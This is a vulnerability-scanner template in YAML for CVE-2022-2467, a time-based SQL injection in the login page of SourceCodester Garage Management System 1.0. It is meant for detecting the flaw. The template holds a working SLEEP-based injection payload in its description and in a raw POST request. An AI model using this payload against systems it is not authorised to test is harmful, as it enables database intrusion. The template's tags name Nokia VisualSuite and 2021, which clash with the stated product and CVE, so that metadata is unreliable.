34 lines
1.3 KiB
YAML
34 lines
1.3 KiB
YAML
|
id: CVE-2022-2467
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: SourceCodester Garage Management System 1.0 - SQL Injection
|
||
|
|
author: edoardottt
|
||
|
|
severity: critical
|
||
|
|
description: |
|
||
|
|
A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
|
||
|
|
reference:
|
||
|
|
- https://github.com/xiahao90/CVEproject/blob/main/xiahao.webray.com.cn/Garage-Management-System.md
|
||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2467
|
||
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2467
|
||
|
|
classification:
|
||
|
|
cve-id: CVE-2022-2467
|
||
|
|
tags: cve,nokia,cve2021,visualsuite,sqli
|
||
|
|
|
||
|
|
requests:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
POST /login.php HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
|
||
|
|
username%3D1%40a.com%27%20AND%20(SELECT%206427%20FROM%20(SELECT(SLEEP(5)))LwLu)%20AND%20%27hsvT%27%3D%27hsvT%26password%3D412312%26login%3D
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: dsl
|
||
|
|
dsl:
|
||
|
|
- 'duration>=5'
|
||
|
|
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 200
|